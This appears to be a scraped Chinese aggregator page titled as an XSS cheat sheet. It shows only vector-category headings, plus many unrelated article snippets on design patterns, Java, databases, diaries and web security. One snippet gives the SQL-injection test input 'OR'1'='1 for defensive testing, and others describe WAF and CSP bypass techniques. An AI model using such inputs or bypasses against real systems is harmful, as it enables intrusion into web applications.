首先我们了解下设计模式的总览：GoF提出的设计模式总共有23种，根据目的准则分类分为三大类：创建型模式，共五种：单例模式、工厂方法模式、抽象工厂模式、建造者模式、原型模式。结构型模式，共七种：适配器模式、装饰模式、代理模式、外观模式、桥接模式、组合模式、享元模式。行为型模式，共十一种：策略模式、模板方法模式、观察者模式、迭代器模式、责任链模式、命令模式、备忘录模式、状态模式、访问者模式、中介者模式
Java设计模式（二十二）行为型- 备忘录模式 Memento Pattern（史上最全备忘录模式）与使用场景以及优缺点刘了个刘 java设计模式 java 设计模式备忘录模式
备忘录模式MementoPattern备忘录模式又称为快照模式（SnapshotPattern）或令牌模式（TokenPattern），是指在不破坏封装的前提下，捕获一个对象的内部状态，并在对象之外保存这个状态，这样以后就可将该对象恢复到原先保存的状态。特征：“后悔药”备忘录模式的主要角色如下：发起人（Originator）角色：记录当前时刻的内部状态信息，提供创建备忘录和恢复备忘录数据的功能，实
设计模式扫荡-行为型模式-责任链、命令、迭代器、备忘录、观察者、状态、策略、模板、访问者 JunSIr_# 面向对象设计模式责任链命令观察者备忘录
设计模式扫荡-行为型模式-责任链、命令、迭代器、备忘录、观察者、状态、策略、模板、访问者文章目录设计模式扫荡-行为型模式-责任链、命令、迭代器、备忘录、观察者、状态、策略、模板、访问者责任链模式（ChainofResponsibilityPattern）命令模式（CommandPattern）迭代器模式（IteratorPattern）备忘录模式（MementoPattern）观察者模式（Obse
【秀娟习惯养成记—2020.10.16】欧秀娟
2020.10.16日习惯养成第54天每到周日，除了感叹时间过得快，还是感叹时间过得快，一天天，一周周，一月月，2020转眼就将接近尾声，年初定下的目标实现了多少？这一年又有哪些成长呢？多问问自己，珍惜当下的每分每秒，努力去做好一件件小事，不求最好，但求比昨天更好。在剩下来的两个多月时间里，在食饮有节上还要注意再注意，因为一到周末休息，不经意间总会吃多。此刻打开手机备忘录，坐在电脑前，开始完成迟到
微信小程序入门【三】：实现简单登录退出和个人信息页面山岫微信小程序微信小程序小程序
效果图预览这个框很是惆怅，但是真机调试没出现过，这个bug下次再解决吧。这次说说登录。效果图：附上代码：home.wxml-->-->-->-->Hi游客{{userInfo.nickName}}-->退出登录@技术支持：江阔jk921home.wxss/*pages/scroll/scroll.wxss*/.top{width:100%;height:400rpx;background-colo
Web应用防火墙 Smile灬凉城666 网络安全 WAF 安全
一、定义与目的WAF是一种特殊类型的防火墙，专门设计用于监视、过滤和阻挡进出Web应用的HTTP流量。其主要目的是保护Web应用免受如XSS（跨站脚本）、SQL注入、会话劫持等网络攻击。二、工作原理WAF工作在应用层，即OSI模型的第七层。它通过对HTTP/HTTPS请求进行解析、协议检测、攻击识别和恶意行为阻断等步骤来保护Web应用。具体来说，WAF会解析进入Web应用的HTTP/HTTPS请求
如何识别和防范跨站脚本攻击（XSS）？盼盼盼 xss 安全网络
识别和防范跨站脚本攻击（XSS）需要一系列的措施，包括输入验证、输出编码、安全配置和用户教育。以下是一些关键步骤：识别XSS异常行为：观察网站行为是否异常，例如页面上突然出现未经预期的内容或功能。错误消息：检查错误消息中是否包含敏感信息，这可能是由于未经过滤的输入导致的。安全工具：使用浏览器插件或安全扫描工具来检测潜在的XSS漏洞。代码审计：定期进行代码审计，查找可能的安全漏洞，特别是在处理用户输
亚马逊AI产品Amazon Q被指出有各种问题，这将导致客户流失至微软市象人工智能网络科技
近日，泄露的消息显示，亚马逊的重要AI产品AmazonQ在发布初期面临不少挑战，并且存在客户转向微软Copilot的风险。这款备受期待的产品在四月份公开发布后，遇到了一系列的问题。内部备忘录显示，八月份时，一些亚马逊网络服务（AWS）的员工在内部Slack频道中表达了对AmazonQ的看法，指出该产品存在功能不足、成本较高以及难以与其他软件集成等问题。更有员工担心，这些问题可能导致客户转投微软的C
当代青年人格分裂图鉴卫校一七药二
分裂，并快乐着当代年轻人真是越活越分裂了。他们一面被动接收着来自社会、长辈的正能量“谆谆教诲”，一面私下里践行着“怎么爽怎么来”的生活哲学。在正能量和丧文化的频频交锋中，他们也在不知不觉间形成了诸多种矛盾人格，我们为各位盘点了以下十种类型的年轻人，相信总有几款是你熟悉的味道：）01每逢新年或xx节点，都是他们大批出没的高峰时段，备忘录里列得满满当当的todolist和朋友圈里洋洋洒洒的“新年献词”
【网络安全】空字节绕过：URL回调+XSS+SQL绕WAF 秋说网络安全 web安全 xss sql 漏洞挖掘
未经许可，不得转载。文章目录空字节URL回调XSSSQL空字节\0，也称为null字节，是一个值为零的特殊字符。在编程中，通常用来表示字符串的结束。攻击者可以利用null字节注入来绕过一些验证或过滤机制。以下三个漏洞，空字节功不可没。URL回调密码重置功能，发起请求后，邮箱会收到链接。请求包中存在callbackUrl参数：在参数中添加/test，发包后，邮箱中的链接为https://compan
Java Web安全与Spring Config对象实战福建低调
本文还有配套的精品资源，点击获取简介：本课程深入探讨JavaWeb开发中的安全实践，包括认证与授权、输入验证、CSRF和XSS防护以及SQL注入防御等关键安全措施。同时，介绍SpringSecurity框架的应用，以及Config对象在Spring配置管理中的作用，包括依赖注入和外部化配置。课程还包括实战演练，通过设置安全环境和安全漏洞模拟，帮助开发者提升应用的安全性和故障排查能力。1.Web安全
软考-常见的23种设计模式整理 ppliu600 软件架构数据仓库数据库数据挖掘
参考：23种设计模式总结设计模式可以将复用别人的解决方案。一、设计模式的分类创建型模式，共5种：单例模式、工厂方法模式、抽象工厂模式、建造者模式、原型模式。结构型模式，共7种：适配器模式、组合模式、代理模式、享元模式、外观模式、桥接模式、装饰器模式、行为型模式，共11种：观察者模式、策略模式、模板方法模式、迭代子模式、责任链模式、命令模式、备忘录模式、状态模式、访问者模式、中介者模式、解释器模式。
【网络安全】URL解析器混淆绕过CSP实现XSS 秋说网络安全 web安全 xss 漏洞挖掘
未经许可，不得转载。文章目录前言正文前言许多流行的静态网站生成器都存在图像CDN功能，它们通过优化网站中的图像来加快页面加载速度。例如：1、OptimizingImages|Next.js利用内置的next/image组件优化图像（nextjs.org）2、NuxtImage:Nuxt应用的图像优化即插即用的图像优化功能，使用内置优化器对图像进行调整（image.nuxt.com）这些工具的目标都
姑娘，痛苦不是财富，对痛苦的思考才是财富进击的Juju
「我们面对同一个世界，却无法看见同一个世界。」《看见》，是知名记者和主持人柴静的一本自传性作品。第一次知道这本书，源于我读大学时新闻学导师的推荐。但其实这本书，不管是新闻从业者，还是普通读者都值得一看。书中有谈到非典、汶川地震、两会报道、北京奥运、华南虎照、征地调查等，可以说是中国社会十年变迁的备忘录。虽然都是社会性事件和调查，但柴静的文章，写得细致真诚，没有戾气，不刻意煽情，却依然直指内心。「她
XSS和sql注入部分场景测试用例样例谷隐凡二测试 xss sql 测试用例
目录1.SQL注入测试用例设计基本SQL注入复杂SQL注入盲注测试2.XSS攻击测试用例设计基本XSS攻击复杂XSS攻击DOM-basedXSS1.SQL注入测试用例设计SQL注入攻击通常通过在输入字段中插入恶意SQL代码，试图操纵数据库查询。设计这些测试用例时，需要涵盖各种常见的SQL注入技术。基本SQL注入用例1:使用单引号:输入:'OR'1'='1预期结果:应拒绝输入并返回错误消息，不应允许
【网络安全】如何预防xss 不会代码的小徐 web安全 xss 安全
XSS(Cross-SiteScripting，跨站脚本攻击)是一种代码注入攻击。攻击者通过在目标网站注入恶意脚本，使其在用户浏览器中执行，从而窃取用户敏感信息如Cookie和SessionID。CSS在前端已经被用了，为了避免歧义用了XSS作为缩写。XSS的本质是恶意代码与网站正常代码混在一起，浏览器无法分辨它们的可信度，最终导致恶意代码被执行。XSS的危害浏览器无法区分恶意代码和正常代码，它们
ASP.NET Core 入门教学十六防止常见的Web攻击充值内卷 asp.net 前端后端
在ASP.NETCore中，防止常见的Web攻击是非常重要的，以确保应用程序的安全性。以下是一些常见的Web攻击类型及其防范措施：1.跨站脚本攻击（XSS）跨站脚本攻击（XSS）是一种通过在网页中注入恶意脚本来攻击用户的浏览器的技术。为了防止XSS攻击，可以采取以下措施：输入验证：对用户输入进行严格的验证和清理。输出编码：在将用户输入的数据插入到HTML页面中时，进行适当的编码。ASP.NETCo
《收获》阿拉萝卜
你问我最近做了些什么收获如何我默然因为说不出来你看那些握在大脑皮层里的神经元那些散落在每本书的扉页每页笔记上的调皮的小清新那些被扔掉的彩色信纸上的勾勒对了还有躺在备忘录里的文字图片发自App它们要如何才能连在一起？我把生活铺成了满天星辰却抓不住任何一颗因为它们已经散漫得不想属于我
HtmlSanitizer: 一个保护你的网站免受XSS攻击的.Net开源项目编程乐趣 xss .net 前端
Html跨站脚本攻击（XSS）是非常常见的，比如博客评论、论坛帖子、社交媒体发布动态等一些用户提交文本的地方，都有可能遭受恶意提交Html代码。为了确保用户提交内容的安全，我们就需要对用户提交内容进行过滤。01项目简介HtmlSanitizer是一个强大的库，它能够审查和清理HTML内容，移除或转义那些可能被用于XSS攻击的标签和属性。这个工具的核心功能是提供一个安全的方式来处理用户提交的HTML
设计模式漫谈之备忘录模式 weixin_34362790 设计模式
最近很长时间没写博客了，其实这个博客写过一半，中间有事耽搁了，就没继续。主要是给别人做了一个小系统，及维护码云上的代码库。同居的日子也占了我很多时间。最近也是烦，欠了7W，各种烦事。所以可想写个博客静静心。在面向对象中关注的焦点是对象空间，对象与对象的联系还是通过保存引用（相当于路），来走到其空间中。在对象中是有空间的，空间里放的肯定是数据或者是命令。备忘录就是把A对象的空间数据，备份到B对象空间
果然复盘010 果然越来越好
果然复盘0102021-3-71今日收获①美图日更读书②关注一些阅读学习公众号，阿猫读书，杨熹文，绽放。读书美学，学习在路上。③文字记录，读书笔记。备忘录翻看到一篇去年的读书笔记，有内容有思考，现在看看居然仍然觉得有可读，果然是触发了思考。④复盘笔记，坚持写。简单的事，持久做。2今日反思①少即是多。挂在嘴上，但是学习上，还是会被精彩分享吸引。忍不住关注，结果又觉得时间不够用。②视频号很火，大家都在
LeetCode[位运算] - #137 Single Number II Cwind java Algorithm LeetCode 题解位运算
原题链接：#137 Single Number II 要求：给定一个整型数组，其中除了一个元素之外，每个元素都出现三次。找出这个元素注意：算法的时间复杂度应为O(n)，最好不使用额外的内存空间难度：中等分析：与#136类似，都是考察位运算。不过出现两次的可以使用异或运算的特性 n XOR n = 0, n XOR 0 = n，即某一
《JavaScript语言精粹》笔记 aijuans JavaScript
0、JavaScript的简单数据类型包括数字、字符创、布尔值（true/false）、null和undefined值，其它值都是对象。 1、JavaScript只有一个数字类型，它在内部被表示为64位的浮点数。没有分离出整数，所以1和1.0的值相同。 2、NaN是一个数值，表示一个不能产生正常结果的运算结果。NaN不等于任何值，包括它本身。可以用函数isNaN(number)检测NaN,但是
你应该更新的Java知识之常用程序库 Kai_Ge java
在很多人眼中，Java 已经是一门垂垂老矣的语言，但并不妨碍 Java 世界依然在前进。如果你曾离开 Java，云游于其它世界，或是每日只在遗留代码中挣扎，或许是时候抬起头，看看老 Java 中的新东西。 Guava Guava[gwɑ:və]，一句话，只要你做Java项目，就应该用Guava（Github）。 guava 是 Google 出品的一套 Java 核心库，在我看来，它甚至应该
HttpClient 120153216 httpclient
/** * 可以传对象的请求转发，对象已流形式放入HTTP中 */ public static Object doPost(Map<String,Object> parmMap,String url) { Object object = null; HttpClient hc = new HttpClient(); String fullURL
Django model字段类型清单 2002wmj django
Django 通过 models 实现数据库的创建、修改、删除等操作，本文为模型中一般常用的类型的清单，便于查询和使用： AutoField：一个自动递增的整型字段，添加记录时它会自动增长。你通常不需要直接使用这个字段；如果你不指定主键的话，系统会自动添加一个主键字段到你的model。(参阅自动主键字段) BooleanField：布尔字段,管理工具里会自动将其描述为checkbox。 Cha
在SQLSERVER中查找消耗CPU最多的SQL 357029540 SQL Server
返回消耗CPU数目最多的10条语句 SELECT TOP 10 total_worker_time/execution_count AS avg_cpu_cost, plan_handle, execution_count, (SELECT SUBSTRING(text, statement_start_of
Myeclipse项目无法部署，Undefined exploded archive location 7454103 eclipse MyEclipse
做个备忘！错误信息为： Undefined exploded archive location 原因：在工程转移过程中，导致工程的配置文件出错；解决方法：
GMT时间格式转换 adminjun GMT 时间转换
普通的时间转换问题我这里就不再罗嗦了，我想大家应该都会那种低级的转换问题吧，现在我向大家总结一下如何转换GMT时间格式，这种格式的转换方法网上还不是很多，所以有必要总结一下，也算给有需要的朋友一个小小的帮助啦。 1、可以使用 SimpleDateFormat SimpleDateFormat EEE-三位星期 d-天 MMM-月 yyyy-四位年
Oracle数据库新装连接串问题 aijuans oracle数据库
割接新装了数据库，客户端登陆无问题，apache/cgi-bin程序有问题，sqlnet.log日志如下： Fatal NI connect error 12170. VERSION INFORMATION: TNS for Linux: Version 10.2.0.4.0 - Product
回顾java数组复制 ayaoxinchao java 数组
在写这篇文章之前，也看了一些别人写的，基本上都是大同小异。文章是对java数组复制基础知识的回顾，算是作为学习笔记，供以后自己翻阅。首先，简单想一下这个问题：为什么要复制数组？我的个人理解：在我们在利用一个数组时，在每一次使用，我们都希望它的值是初始值。这时我们就要对数组进行复制，以达到原始数组值的安全性。java数组复制大致分为3种方式：①for循环方式 ②clone方式 ③arrayCopy方
java web会话监听并使用spring注入 bewithme Java Web
在java web应用中，当你想在建立会话或移除会话时，让系统做某些事情，比如说，统计在线用户，每当有用户登录时，或退出时，那么可以用下面这个监听器来监听。 import java.util.ArrayList; import java.ut
NoSQL数据库之Redis数据库管理(Redis的常用命令及高级应用) bijian1013 redis 数据库 NoSQL
一 .Redis常用命令 Redis提供了丰富的命令对数据库和各种数据库类型进行操作，这些命令可以在Linux终端使用。 a.键值相关命令 b.服务器相关命令 1.键值相关命令 &
java枚举序列化问题 bingyingao java 枚举序列化
对象在网络中传输离不开序列化和反序列化。而如果序列化的对象中有枚举值就要特别注意一些发布兼容问题: 1.加一个枚举值新机器代码读分布式缓存中老对象，没有问题，不会抛异常。老机器代码读分布式缓存中新对像，反序列化会中断，所以在所有机器发布完成之前要避免出现新对象，或者提前让老机器拥有新增枚举的jar。 2.删一个枚举值新机器代码读分布式缓存中老对象，反序列
【Spark七十八】Spark Kyro序列化 bit1129 spark
当使用SparkContext的saveAsObjectFile方法将对象序列化到文件，以及通过objectFile方法将对象从文件反序列出来的时候，Spark默认使用Java的序列化以及反序列化机制，通常情况下，这种序列化机制是很低效的，Spark支持使用Kyro作为对象的序列化和反序列化机制，序列化的速度比java更快，但是使用Kyro时要注意，Kyro目前还是有些bug。 Spark
Hybridizing OO and Functional Design bookjovi erlang haskell
推荐博文： Tell Above, and Ask Below - Hybridizing OO and Functional Design 文章中把OO和FP讲的深入透彻，里面把smalltalk和haskell作为典型的两种编程范式代表语言，此点本人极为同意，smalltalk可以说是最能体现OO设计的面向对象语言，smalltalk的作者Alan kay也是OO的最早先驱，
Java-Collections Framework学习与总结-HashMap BrokenDreams Collections
开发中常常会用到这样一种数据结构，根据一个关键字，找到所需的信息。这个过程有点像查字典，拿到一个key，去字典表中查找对应的value。Java1.0版本提供了这样的类java.util.Dictionary(抽象类)，基本上支持字典表的操作。后来引入了Map接口，更好的描述的这种数据结构。 &nb
读《研磨设计模式》-代码笔记-职责链模式-Chain Of Responsibility bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ /** * 业务逻辑：项目经理只能处理500以下的费用申请，部门经理是1000，总经理不设限。简单起见，只同意“Tom”的申请 * bylijinnan */ abstract class Handler { /*
Android中启动外部程序 cherishLC android
1、启动外部程序引用自： http://blog.csdn.net/linxcool/article/details/7692374 //方法一 Intent intent=new Intent(); //包名包名+类名（全路径） intent.setClassName("com.linxcool", "com.linxcool.PlaneActi
summary_keep_rate coollyj SUM
BEGIN /*DECLARE minDate varchar(20) ; DECLARE maxDate varchar(20) ;*/ DECLARE stkDate varchar(20) ; DECLARE done int default -1; /* 游标中注册服务器地址 */ DE
hadoop hdfs 添加数据目录出错 daizj hadoop hdfs 扩容
由于原来配置的hadoop data目录快要用满了，故准备修改配置文件增加数据目录，以便扩容，但由于疏忽，把core-site.xml, hdfs-site.xml配置文件dfs.datanode.data.dir 配置项增加了配置目录，但未创建实际目录，重启datanode服务时，报如下错误： 2014-11-18 08:51:39,128 WARN org.apache.hadoop.h
grep 目录级联查找 dongwei_6688 grep
在Mac或者Linux下使用grep进行文件内容查找时，如果给定的目标搜索路径是当前目录，那么它默认只搜索当前目录下的文件，而不会搜索其下面子目录中的文件内容，如果想级联搜索下级目录，需要使用一个“-r”参数： grep -n -r "GET" . 上面的命令将会找出当前目录“.”及当前目录中所有下级目录
yii 修改模块使用的布局文件 dcj3sjt126com yii layouts
方法一：yii模块默认使用系统当前的主题布局文件，如果在主配置文件中配置了主题比如: 'theme'=>'mythm', 那么yii的模块就使用 protected/themes/mythm/views/layouts 下的布局文件；如果未配置主题，那么 yii的模块就使用 protected/views/layouts 下的布局文件，总之默认不是使用自身目录 pr
设计模式之单例模式 come_for_dream 设计模式单例模式懒汉式饿汉式双重检验锁失败无序写入
今天该来的面试还没来，这个店估计不会来电话了，安静下来写写博客也不错，没事翻了翻小易哥的博客甚至与大牛们之间的差距，基础知识不扎实建起来的楼再高也只能是危楼罢了，陈下心回归基础把以前学过的东西总结一下。 *********************************
8、数组豆豆咖啡二维数组数组一维数组
一、概念数组是同一种类型数据的集合。其实数组就是一个容器。二、好处可以自动给数组中的元素从0开始编号，方便操作这些元素三、格式 //一维数组 1,元素类型[] 变量名 = new 元素类型[元素的个数] int[] arr =
Decode Ways hcx2013 decode
A message containing letters from A-Z is being encoded to numbers using the following mapping: 'A' -> 1 'B' -> 2 ... 'Z' -> 26 Given an encoded message containing digits, det
Spring4.1新特性——异步调度和事件机制的异常处理 jinnianshilongnian spring 4.1
目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
squid3(高命中率)缓存服务器配置 liyonghui160com
系统:centos 5.x 需要的软件:squid-3.0.STABLE25.tar.gz 1.下载squid wget http://www.squid-cache.org/Versions/v3/3.0/squid-3.0.STABLE25.tar.gz tar zxf squid-3.0.STABLE25.tar.gz &&
避免Java应用中NullPointerException的技巧和最佳实践 pda158 java
1) 从已知的String对象中调用equals()和equalsIgnoreCase()方法，而非未知对象。　　总是从已知的非空String对象中调用equals()方法。因为equals()方法是对称的，调用a.equals(b)和调用b.equals(a)是完全相同的，这也是为什么程序员对于对象a和b这么不上心。如果调用者是空指针，这种调用可能导致一个空指针异常 Object unk
如何在Swift语言中创建http请求 shoothao http swift
概述：本文通过实例从同步和异步两种方式上回答了”如何在Swift语言中创建http请求“的问题。如果你对Objective-C比较了解的话，对于如何创建http请求你一定驾轻就熟了，而新语言Swift与其相比只有语法上的区别。但是，对才接触到这个崭新平台的初学者来说，他们仍然想知道“如何在Swift语言中创建http请求？”。在这里,我将作出一些建议来回答上述问题。常见的
Spring事务的传播方式 uule spring事务
传播方式：新建事务 required required_new - 挂起当前非事务方式运行 supports &nbs

XSS备忘录

HTML4和一些老的向量

X(HT)ML相关向量

UTF-7和其它诡异的编码集的向量

客户端DOS向量

HTML behavior和binding相关向量

Clickjacking和UI Redressing的向量

Drop me

你可能感兴趣的:(XSS备忘录)